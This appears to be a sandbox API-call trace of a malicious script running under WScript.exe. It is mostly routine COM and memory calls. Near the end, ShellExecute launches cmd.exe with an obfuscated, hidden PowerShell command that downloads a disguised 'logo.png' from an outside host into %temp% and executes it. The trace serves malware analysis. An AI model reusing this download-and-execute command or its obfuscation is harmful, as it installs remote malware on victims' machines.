	[0048.305] GetTickCount () returned 0x1d46d
	[0048.306] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x255a68 | out: ppv=0x255a68*=0x40f420) returned 0x0
	[0048.307] ??3@YAXPEAX@Z () returned 0x1
	[0048.307] ??3@YAXPEAX@Z () returned 0x2b4003b0001
	[0048.308] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x255a68 | out: ppv=0x255a68*=0x40f420) returned 0x0
	[0048.309] MulDiv (nNumber=997, nNumerator=100, nDenominator=3476) returned 29
	[0048.309] IUnknown:Release (This=0x40f420) returned 0x1
	[0048.309] GetTickCount () returned 0x1d46d
	[0048.310] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x24fe78 | out: ppv=0x24fe78*=0x40f420) returned 0x0
	[0048.310] ??3@YAXPEAX@Z () returned 0x18002f0001
	[0048.310] ??3@YAXPEAX@Z () returned 0x19000b0001
	[0048.332] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x24fb78 | out: ppv=0x24fb78*=0x40f420) returned 0x0
	[0048.332] MulDiv (nNumber=1016, nNumerator=100, nDenominator=3496) returned 29
	[0048.332] IUnknown:Release (This=0x40f420) returned 0x1
	[0048.332] GetTickCount () returned 0x1d48d
	[0048.333] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x251908 | out: ppv=0x251908*=0x40f420) returned 0x0
	[0048.333] ??3@YAXPEAX@Z () returned 0x1
	[0048.334] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x24daa8 | out: ppv=0x24daa8*=0x40f420) returned 0x0
	[0048.334] MulDiv (nNumber=1128, nNumerator=100, nDenominator=3607) returned 31
	[0048.334] IUnknown:Release (This=0x40f420) returned 0x1
	[0048.335] GetTickCount () returned 0x1d48d
	[0048.335] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x24daa8 | out: ppv=0x24daa8*=0x40f420) returned 0x0
	[0048.338] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x24daa8 | out: ppv=0x24daa8*=0x40f420) returned 0x0
	[0048.338] MulDiv (nNumber=984, nNumerator=100, nDenominator=3525) returned 28
	[0048.338] IUnknown:Release (This=0x40f420) returned 0x1
	[0048.338] GetTickCount () returned 0x1d48d
	[0048.339] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x24daa8 | out: ppv=0x24daa8*=0x40f420) returned 0x0
	[0048.339] ??3@YAXPEAX@Z () returned 0x51a00ef0001
	[0048.339] ??3@YAXPEAX@Z () returned 0x51b01ac0001
	[0048.341] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x24daa8 | out: ppv=0x24daa8*=0x40f420) returned 0x0
	[0048.342] MulDiv (nNumber=980, nNumerator=100, nDenominator=3576) returned 27
	[0048.342] IUnknown:Release (This=0x40f420) returned 0x1
	[0048.342] GetTickCount () returned 0x1d48d
	[0048.390] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x24daa8 | out: ppv=0x24daa8*=0x40f420) returned 0x0
	[0048.390] ??3@YAXPEAX@Z () returned 0x1
	[0048.390] ??3@YAXPEAX@Z () returned 0x5c600920001
	[0048.392] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x24daa8 | out: ppv=0x24daa8*=0x40f420) returned 0x0
	[0048.392] ??3@YAXPEAX@Z () returned 0x41b00e90001
	[0048.393] MulDiv (nNumber=979, nNumerator=100, nDenominator=3636) returned 27
	[0048.393] IUnknown:Release (This=0x40f420) returned 0x1
	[0048.393] GetTickCount () returned 0x1d4cb
	[0048.394] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x24daa8 | out: ppv=0x24daa8*=0x40f420) returned 0x0
	[0048.396] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x24daa8 | out: ppv=0x24daa8*=0x40f420) returned 0x0
	[0048.396] MulDiv (nNumber=990, nNumerator=100, nDenominator=3729) returned 27
	[0048.396] IUnknown:Release (This=0x40f420) returned 0x1
	[0048.396] GetTickCount () returned 0x1d4cb
	[0048.397] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x251908 | out: ppv=0x251908*=0x40f420) returned 0x0
	[0048.398] ??3@YAXPEAX@Z () returned 0x77501ca0001
	[0048.398] ??3@YAXPEAX@Z () returned 0x776002f0001
	[0048.400] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x24bd18 | out: ppv=0x24bd18*=0x40f420) returned 0x0
	[0048.400] MulDiv (nNumber=1186, nNumerator=100, nDenominator=3760) returned 32
	[0048.400] IUnknown:Release (This=0x40f420) returned 0x1
	[0048.400] GetTickCount () returned 0x1d4cb
	[0048.401] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x24bd18 | out: ppv=0x24bd18*=0x40f420) returned 0x0
	[0048.401] ??3@YAXPEAX@Z () returned 0x5b7012e0001
	[0048.401] ??3@YAXPEAX@Z () returned 0x5b801d30001
	[0048.403] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x24bd18 | out: ppv=0x24bd18*=0x40f420) returned 0x0
	[0048.403] MulDiv (nNumber=969, nNumerator=100, nDenominator=3591) returned 27
	[0048.403] IUnknown:Release (This=0x40f420) returned 0x1
	[0048.403] GetTickCount () returned 0x1d4cb
	[0048.405] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x24bd18 | out: ppv=0x24bd18*=0x40f420) returned 0x0
	[0048.405] ??3@YAXPEAX@Z () returned 0x879003e0001
	[0048.405] ??3@YAXPEAX@Z () returned 0x87a01b20001
	[0048.407] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x247eb8 | out: ppv=0x247eb8*=0x40f420) returned 0x0
	[0048.407] MulDiv (nNumber=1015, nNumerator=100, nDenominator=3620) returned 28
	[0048.407] IUnknown:Release (This=0x40f420) returned 0x1
	[0048.407] GetTickCount () returned 0x1d4db
	[0048.410] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x222e78 | out: ppv=0x222e78*=0x40f420) returned 0x0
	[0048.410] ??3@YAXPEAX@Z () returned 0x8ff01130001
	[0048.410] ??3@YAXPEAX@Z () returned 0x90000710001
	[0048.416] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1d4ef8 | out: ppv=0x1d4ef8*=0x40f420) returned 0x0
	[0048.416] free (_Block=0x335460) 
	[0048.416] ??3@YAXPEAX@Z () returned 0xc00620001
	[0048.416] ??3@YAXPEAX@Z () returned 0x100200001
	[0048.417] free (_Block=0x32ed80) 
	[0048.417] free (_Block=0x339560) 
	[0048.417] ??3@YAXPEAX@Z () returned 0x1009c0001
	[0048.417] ??3@YAXPEAX@Z () returned 0x1002c0001
	[0048.417] MulDiv (nNumber=958, nNumerator=100, nDenominator=3645) returned 26
	[0048.417] IUnknown:Release (This=0x40f420) returned 0x1
	[0048.417] GetTickCount () returned 0x1d4db
	[0048.420] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1adf38 | out: ppv=0x1adf38*=0x40f420) returned 0x0
	[0048.595] _resetstkoflw () returned 0x1
	[0048.596] FindResourceA (hModule=0x7fee32d0000, lpName=0x2, lpType=0x6) returned 0x130718
	[0048.596] LoadResource (hModule=0x7fee32d0000, hResInfo=0x130718) returned 0x130b6c
	[0048.596] LockResource (hResData=0x130b6c) returned 0x130b6c
	[0048.596] SizeofResource (hModule=0x7fee32d0000, hResInfo=0x130718) returned 0x86
	[0048.596] FreeResource (hResData=0x130b6c) returned 0
	[0048.596] FindResourceA (hModule=0x7fee32d0000, lpName=0x101, lpType=0x6) returned 0x1307e8
	[0048.596] LoadResource (hModule=0x7fee32d0000, hResInfo=0x1307e8) returned 0x131c74
	[0048.596] LockResource (hResData=0x131c74) returned 0x131c74
	[0048.596] SizeofResource (hModule=0x7fee32d0000, hResInfo=0x1307e8) returned 0xce
	[0048.597] FreeResource (hResData=0x131c74) returned 0
	[0048.597] GetTickCount () returned 0x1d596
	[0048.597] bsearch (_Key=0x1733d8, _Base=0x7fee339a3c0, _NumOfElements=0x5d, _SizeOfElements=0x8, _PtFuncCompare=0x7fee33281a0) returned 0x7fee339a410
	[0048.597] ??2@YAPEAX_K@Z () returned 0x2899e0
	[0048.598] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2517b8 | out: ppv=0x2517b8*=0x40f420) returned 0x0
	[0048.598] free (_Block=0x31a4f0) 
	[0048.598] ??3@YAXPEAX@Z () returned 0x1
	[0048.598] free (_Block=0x32eea0) 
	[0048.598] free (_Block=0x3314a0) 
	[0048.598] free (_Block=0x339780) 
	[0048.598] ??3@YAXPEAX@Z () returned 0x1
	[0048.598] ??3@YAXPEAX@Z () returned 0x101120001
	[0048.598] free (_Block=0x32ee10) 
	[0048.598] free (_Block=0x3316b0) 
	[0048.598] free (_Block=0x339670) 
	[0048.598] ??3@YAXPEAX@Z () returned 0xe00910001
	[0048.598] ??3@YAXPEAX@Z () returned 0x1
	[0048.598] free (_Block=0x31a4b0) 
	[0048.598] free (_Block=0x32ecf0) 
	[0048.598] free (_Block=0x339450) 
	[0048.598] ??3@YAXPEAX@Z () returned 0xf00860001
	[0048.598] ??3@YAXPEAX@Z () returned 0xb001e0001
	[0048.598] free (_Block=0x31a470) 
	[0048.599] ??3@YAXPEAX@Z () returned 0x1
	[0048.599] free (_Block=0x32ec60) 
	[0048.599] free (_Block=0x331080) 
	[0048.599] free (_Block=0x339340) 
	[0048.599] ??3@YAXPEAX@Z () returned 0x1000700001
	[0048.599] ??3@YAXPEAX@Z () returned 0x200420001
	[0048.599] free (_Block=0x32ebd0) 
	[0048.599] free (_Block=0x331290) 
	[0048.599] free (_Block=0x339230) 
	[0048.599] ??3@YAXPEAX@Z () returned 0x1100650001
	[0048.599] ??3@YAXPEAX@Z () returned 0x200720001
	[0048.599] free (_Block=0x31a430) 
	[0048.599] free (_Block=0x32eab0) 
	[0048.599] free (_Block=0x339010) 
	[0048.599] ??3@YAXPEAX@Z () returned 0x12005a0001
	[0048.599] ??3@YAXPEAX@Z () returned 0xe01ec0001
	[0048.599] free (_Block=0x31a3f0) 
	[0048.599] ??3@YAXPEAX@Z () returned 0xf01d00001
	[0048.599] free (_Block=0x32ea20) 
	[0048.599] free (_Block=0x330c60) 
	[0048.599] free (_Block=0x32bdc0) 
	[0048.599] ??3@YAXPEAX@Z () returned 0x1300440001
	[0048.600] ??3@YAXPEAX@Z () returned 0x3003a0001
	[0048.600] free (_Block=0x32e990) 
	[0048.600] free (_Block=0x330e70) 
	[0048.600] free (_Block=0x32bcb0) 
	[0048.600] ??3@YAXPEAX@Z () returned 0x1400390001
	[0048.600] ??3@YAXPEAX@Z () returned 0x3006b0001
	[0048.600] free (_Block=0x31a3b0) 
	[0048.600] free (_Block=0x32e870) 
	[0048.600] free (_Block=0x32ba90) 
	[0048.600] ??3@YAXPEAX@Z () returned 0x15002e0001
	[0048.600] ??3@YAXPEAX@Z () returned 0x1001c20001
	[0048.601] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x7fefea30000
	[0048.601] GetProcAddress (hModule=0x7fefea30000, lpProcName="CLSIDFromProgIDEx") returned 0x7fefea4a4c4
	[0048.601] CLSIDFromProgIDEx (in: lpszProgID="WScript.Shell", lpclsid=0x25d010 | out: lpclsid=0x25d010*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8))) returned 0x0
	[0048.604] SysStringLen (param_1=0x0) returned 0x0
	[0048.605] GetProcAddress (hModule=0x7fefea30000, lpProcName="CoGetClassObject") returned 0x7fefea62e18
	[0048.605] CoGetClassObject (in: rclsid=0x25d010*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fee3376300*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x25cfe0 | out: ppv=0x25cfe0*=0x305380) returned 0x0
	[0049.183] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x25b2b0 | out: lpSystemTimeAsFileTime=0x25b2b0*(dwLowDateTime=0x96571160, dwHighDateTime=0x1d543d1)) 
	[0049.183] GetCurrentProcessId () returned 0xb58
	[0049.184] GetCurrentThreadId () returned 0xb5c
	[0049.184] GetTickCount () returned 0x1d670
	[0049.184] QueryPerformanceCounter (in: lpPerformanceCount=0x25b2b8 | out: lpPerformanceCount=0x25b2b8*=17360966794) returned 1
	[0049.184] malloc (_Size=0x100) returned 0x3163a0
	[0049.184] GetVersionExA (in: lpVersionInformation=0x25b090*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0xe31b2dc8, dwBuildNumber=0x7fe, dwPlatformId=0xe31a0000, szCSDVersion="\xfe\x07") | out: lpVersionInformation=0x25b090*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0049.184] GetUserDefaultLCID () returned 0x409
	[0049.184] ??2@YAPEAX_K@Z () returned 0x305380
	[0049.184] ??2@YAPEAX_K@Z () returned 0x328e20
	[0049.184] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x25ce10, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\WScript.exe" (normalized: "c:\\windows\\system32\\wscript.exe")) returned 0x1f
	[0049.184] lstrlenA (lpString="\\wscript.exe") returned 12
	[0049.184] lstrlenA (lpString="C:\\Windows\\System32\\WScript.exe") returned 31
	[0049.185] _strcmpi (_Str1="\\WScript.exe", _Str2="\\wscript.exe") returned 0
	[0049.185] GetModuleHandleA (lpModuleName=0x0) returned 0xff410000
	[0049.185] GetProcAddress (hModule=0xff410000, lpProcName=0x1) returned 0xff41d7f8
	[0049.185] ??3@YAXPEAX@Z () returned 0x3b003e0001
	[0049.185] GetTickCount () returned 0x1d680
	[0049.185] malloc (_Size=0x808) returned 0x2e6fa0
	[0049.188] CreateErrorInfo (in: pperrinfo=0x25c0b0 | out: pperrinfo=0x25c0b0*=0x43a718) returned 0x0
	[0049.188] CErrorObject::SetGUID () returned 0x0
	[0049.189] CErrorObject::SetSource () returned 0x0
	[0049.189] LoadStringW (in: hInstance=0x7fee31a0000, uID=0x1004, lpBuffer=0x25a7f0, cchBufferMax=2048 | out: lpBuffer="The shortcut pathname must end with .lnk or .url.") returned 0x31
	[0049.189] FormatMessageW (in: dwFlags=0x500, lpSource=0x43e5d8, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0x25c0c0, nSize=0x0, Arguments=0x25c130 | out: lpBuffer="\xb4b0\x48") returned 0x31
	[0049.189] CErrorObject::SetDescription () returned 0x0
	[0049.189] CErrorObject::SetHelpFile () returned 0x0
	[0049.189] CErrorObject::SetHelpContext () returned 0x0
	[0049.189] QueryInterface () returned 0x0
	[0049.189] SetErrorInfo (dwReserved=0x0, perrinfo=0x43a710) returned 0x0
	[0049.189] Release () returned 0x2
	[0049.189] IUnknown:Release (This=0x43a710) returned 0x1
	[0049.189] LocalFree (hMem=0x48b4b0) returned 0x0
	[0049.190] IUnknown:Release (This=0x48a220) returned 0x1
	[0049.190] CLSIDFromProgIDEx (in: lpszProgID="shell.applicatiOn", lpclsid=0x25b280 | out: lpclsid=0x25b280*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0049.193] SysStringLen (param_1=0x0) returned 0x0
	[0049.193] CoGetClassObject (in: rclsid=0x25b280*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fee3376300*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x25b250 | out: ppv=0x25b250*=0x7fefdfd8d20) returned 0x0
	[0049.194] Shell:IUnknown:QueryInterface (in: This=0x7fefdfd8d20, riid=0x7fee3376310*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x25b258 | out: ppvObject=0x25b258*=0x0) returned 0x80004002
	[0049.194] Shell:IClassFactory:CreateInstance (in: This=0x7fefdfd8d20, pUnkOuter=0x0, riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x25b240 | out: ppvObject=0x25b240*=0x43a710) returned 0x0
	[0049.194] Shell:IUnknown:Release (This=0x7fefdfd8d20) returned 0x1
	[0049.194] Shell:IUnknown:QueryInterface (in: This=0x43a710, riid=0x7fee3376320*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x25b220 | out: ppvObject=0x25b220*=0x43a750) returned 0x0
	[0049.194] ??2@YAPEAX_K@Z () returned 0x305020
	[0049.195] Shell:IObjectWithSite:SetSite (This=0x43a750, pUnkSite=0x305020) returned 0x0
	[0049.195] Shell:IUnknown:AddRef (This=0x305020) returned 0x2
	[0049.195] Shell:IUnknown:Release (This=0x43a750) returned 0x1
	[0049.195] Shell:IUnknown:QueryInterface (in: This=0x43a710, riid=0x7fee3376370*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x25b1f8 | out: ppvObject=0x25b1f8*=0x0) returned 0x80004002
	[0049.195] Shell:IUnknown:QueryInterface (in: This=0x43a710, riid=0x7fee3376518*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x25b170 | out: ppvObject=0x25b170*=0x0) returned 0x80004002
	[0049.195] Shell:IUnknown:QueryInterface (in: This=0x43a710, riid=0x7fee33764f8*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x25b178 | out: ppvObject=0x25b178*=0x0) returned 0x80004002
	[0049.195] Shell:IUnknown:QueryInterface (in: This=0x43a710, riid=0x7fee3376508*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x25b180 | out: ppvObject=0x25b180*=0x0) returned 0x80004002
	[0049.195] Shell:IUnknown:QueryInterface (in: This=0x43a710, riid=0x7fee3376340*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x25b188 | out: ppvObject=0x25b188*=0x43a710) returned 0x0
	[0049.195] GetTickCount () returned 0x1d680
	[0049.195] Shell:IUnknown:Release (This=0x43a710) returned 0x1
	[0049.195] realloc (_Block=0x270990, _Size=0x140) returned 0x275540
	[0049.196] MulDiv (nNumber=958, nNumerator=100, nDenominator=3511) returned 27
	[0049.196] IUnknown:Release (This=0x40f420) returned 0x1
	[0049.196] GetTickCount () returned 0x1d680
	[0049.198] MulDiv (nNumber=942, nNumerator=100, nDenominator=3617) returned 26
	[0049.198] IUnknown:Release (This=0x40f420) returned 0x1
	[0049.198] GetTickCount () returned 0x1d680
	[0049.199] FindResourceA (hModule=0x7fee32d0000, lpName=0x2, lpType=0x6) returned 0x130718
	[0049.199] LoadResource (hModule=0x7fee32d0000, hResInfo=0x130718) returned 0x130b6c
	[0049.199] LockResource (hResData=0x130b6c) returned 0x130b6c
	[0049.199] SizeofResource (hModule=0x7fee32d0000, hResInfo=0x130718) returned 0x86
	[0049.200] FreeResource (hResData=0x130b6c) returned 0
	[0049.200] FindResourceA (hModule=0x7fee32d0000, lpName=0x101, lpType=0x6) returned 0x1307e8
	[0049.200] LoadResource (hModule=0x7fee32d0000, hResInfo=0x1307e8) returned 0x131c74
	[0049.200] LockResource (hResData=0x131c74) returned 0x131c74
	[0049.200] SizeofResource (hModule=0x7fee32d0000, hResInfo=0x1307e8) returned 0xce
	[0049.200] FreeResource (hResData=0x131c74) returned 0
	[0049.200] bsearch (_Key=0x1733d8, _Base=0x7fee339a3c0, _NumOfElements=0x5d, _SizeOfElements=0x8, _PtFuncCompare=0x7fee33281a0) returned 0x7fee339a410
	[0049.201] Shell:IDispatch:GetIDsOfNames (in: This=0x43a710, riid=0x7fee3376360*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x25b380*="ShellExecute", cNames=0x1, lcid=0x409, rgDispId=0x25b230 | out: rgDispId=0x25b230*=1610809345) returned 0x0
	[0049.214] Shell:IUnknown:AddRef (This=0x43a710) returned 0x2
	[0049.215] Shell:IDispatch:Invoke (in: This=0x43a710, dispIdMember=1610809345, riid=0x7fee3376360*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x25b118*(rgvarg=([0]=0x25b130*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), [1]=0x25b148*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="open", varVal2=0x3055e0), [2]=0x25b160*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="", varVal2=0x3055e0), [3]=0x25b178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="/c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu", varVal2=0x3055e0), [4]=0x25b190*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="cmd.exe", varVal2=0x3055e0)), rgdispidNamedArgs=0x0, cArgs=0x5, cNamedArgs=0x0), pVarResult=0x25b658, pExcepInfo=0x25b0c0, puArgErr=0x25b0b4 | out: pDispParams=0x25b118*(rgvarg=([0]=0x25b130*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), [1]=0x25b148*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="open", varVal2=0x3055e0), [2]=0x25b160*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="", varVal2=0x3055e0), [3]=0x25b178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="/c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu", varVal2=0x3055e0), [4]=0x25b190*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="cmd.exe", varVal2=0x3055e0)), rgdispidNamedArgs=0x0, cArgs=0x5, cNamedArgs=0x0), pVarResult=0x25b658*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x7fefd33ed80), pExcepInfo=0x25b0c0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x25b0b4*=0x43d2) returned 0x0
	[0049.810] SendMessageA (hWnd=0x301f2, Msg=0x402, wParam=0x0, lParam=0x0) returned 0x0
